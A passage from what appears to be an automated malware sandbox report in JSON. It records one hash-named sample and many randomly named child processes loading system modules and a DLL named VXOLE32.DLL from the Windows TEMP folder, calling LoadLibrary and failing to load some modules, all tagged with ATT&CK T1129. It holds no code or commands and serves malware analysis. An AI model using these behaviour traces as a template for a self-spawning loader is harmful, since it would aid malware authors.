\"jfnlx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jfnlx.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"jfnlx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jfnlx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"rdrhhx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"rdrhhx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rdrhhx.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"rdrhhx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rdrhhx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"dtndd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75150000\n \"bdxfltt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"bdxfltt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"bdxfltt.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"bdxfltt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"bdxfltt.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"djhpdbh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"djhpdbh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"djhpdbh.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"djhpdbh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"djhpdbh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"djhpdbh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75150000\n \"vxjvbn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"vxjvbn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"vxjvbn.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"vxjvbn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"vxjvbn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"pnxhn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"pnxhn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"pnxhn.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"pnxhn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"pnxhn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"4202648.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"4202648.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4202648.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"4202648.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4202648.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"rhxdb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"rhxdb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rhxdb.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"rhxdb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rhxdb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"26684.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75150000\n \"426882.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"426882.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"426882.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"426882.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"426882.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"dpdrtr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"dpdrtr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dpdrtr.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"dpdrtr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dpdrtr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"dpdrtr.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75150000\n \"rpnxll.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"rpnxll.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rpnxll.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"rpnxll.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rpnxll.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"0406488.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75150000\n \"848084.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"848084.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"848084.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"848084.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"848084.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"802262.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"802262.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"802262.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"802262.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"802262.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000\n \"802262.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75150000\n \"048424.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"048424.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"048424.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"048424.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"048424.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6afa0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005968)\n \"24680.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003744)\n \"24680.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003744)\n \"24680.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003744)\n \"24680.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003744)\n \"00062.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005896)\n \"00062.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005896)\n \"00062.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005896)\n \"00062.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005896)\n \"njhfl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004296)\n \"njhfl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004296)\n \"njhfl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004296)\n \"njhfl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004296)\n \"60064.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004340)\n \"60064.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004340)\n \"60064.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004340)\n \"60064.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004340)\n \"2288488.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006120)\n \"2288488.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006120)\n \"2288488.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006120)\n \"2288488.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006120)\n \"48866.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004236)\n \"48866.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004236)\n \"48866.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004236)\n \"48866.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004236)\n \"xbxthhr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005860)\n \"xbxthhr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005860)\n \"xbxthhr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005860)\n \"xbxthhr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005860)\n \"fhhxhtt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004460)\n \"fhhxhtt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004460)\n \"fhhxhtt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004460)\n \"fhhxhtt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004460)\n \"08446.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004488)\n \"08446.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004488)\n \"08446.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004488)\n \"08446.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004488)\n \"8240402.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003564)\n \"8240402.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003564)\n \"8240402.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003564)\n \"8240402.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003564)\n \"802848.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003980)\n \"802848.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003980)\n \"802848.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003980)\n \"802848.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003980)\n \"4404864.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003628)\n \"4404864.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003628)\n \"4404864.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003628)\n \"4404864.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003628)\n \"dbhbvhd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004092)\n \"dbhbvhd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004092)\n \"dbhbvhd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004092)\n \"dbhbvhd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004092)\n \"xfllptv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003276)\n \"xfllptv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003276)\n \"xfllptv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003276)\n \"xfllptv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003276)\n \"pppjrfj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002472)\n \"pppjrfj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002472)\n \"pppjrfj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002472)\n \"pppjrfj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002472)\n \"tjtvdt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002700)\n \"tjtvdt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002700)\n \"tjtvdt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002700)\n \"tjtvdt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002700)\n \"dtdld.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004568)\n \"dtdld.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004568)\n \"dtdld.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004568)\n \"dtdld.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004568)\n \"tjjhnh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004492)\n \"tjjhnh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004492)\n \"tjjhnh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004492)\n \"tjjhnh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004492)\n \"brpvfll.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002416)\n \"brpvfll.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002416)\n \"brpvfll.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002416)\n \"brpvfll.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002416)\n \"brpvfll.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00002416)\n \"brpvfll.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00002416)\n \"brpvfll.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002416)\n \"240248.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003864)\n \"240248.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003864)\n \"240248.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003864)\n \"240248.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003864)\n \"20468.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003656)\n \"20468.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003656)\n \"20468.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003656)\n \"20468.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003656)\n \"jjjhv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004048)\n \"jjjhv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004048)\n \"jjjhv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004048)\n \"jjjhv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004048)\n \"jfnlx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001844)\n \"jfnlx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001844)\n \"jfnlx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001844)\n \"jfnlx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001844)\n \"rdrhhx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004364)\n \"rdrhhx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004364)\n \"rdrhhx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004364)\n \"rdrhhx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004364)\n \"bdxfltt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003264)\n \"bdxfltt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003264)\n \"bdxfltt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003264)\n \"bdxfltt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003264)\n \"djhpdbh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004540)\n \"djhpdbh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004540)\n \"djhpdbh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004540)\n \"djhpdbh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004540)\n \"vxjvbn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004584)\n \"vxjvbn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004584)\n \"vxjvbn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004584)\n \"vxjvbn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004584)\n \"pnxhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003844)\n \"pnxhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003844)\n \"pnxhn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003844)\n \"pnxhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003844)\n \"4202648.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003700)\n \"4202648.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003700)\n \"4202648.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003700)\n \"4202648.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003700)\n \"rhxdb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004020)\n \"rhxdb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004020)\n \"rhxdb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004020)\n \"rhxdb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004020)\n \"426882.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002388)\n \"426882.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002388)\n \"426882.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002388)\n \"426882.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002388)\n \"dpdrtr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003976)\n \"dpdrtr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003976)\n \"dpdrtr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003976)\n \"dpdrtr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003976)\n \"rpnxll.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003304)\n \"rpnxll.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003304)\n \"rpnxll.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003304)\n \"rpnxll.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003304)\n \"848084.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000784)\n \"848084.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000784)\n \"848084.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000784)\n \"848084.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000784)\n \"802262.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001604)\n \"802262.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001604)\n \"802262.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001604)\n \"802262.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001604)\n \"048424.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002840)\n \"048424.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002840)\n \"048424.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002840)\n \"048424.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002840)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"24680.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"24680.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"00062.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"00062.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"njhfl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"njhfl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"60064.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"60064.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"2288488.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"2288488.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"48866.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"48866.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xbxthhr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xbxthhr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fhhxhtt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fhhxhtt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"08446.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"08446.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8240402.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8240402.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"802848.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"802848.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4404864.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4404864.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dbhbvhd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dbhbvhd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xfllptv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xfllptv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"pppjrfj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"pppjrfj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"tjtvdt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"tjtvdt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dtdld.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n 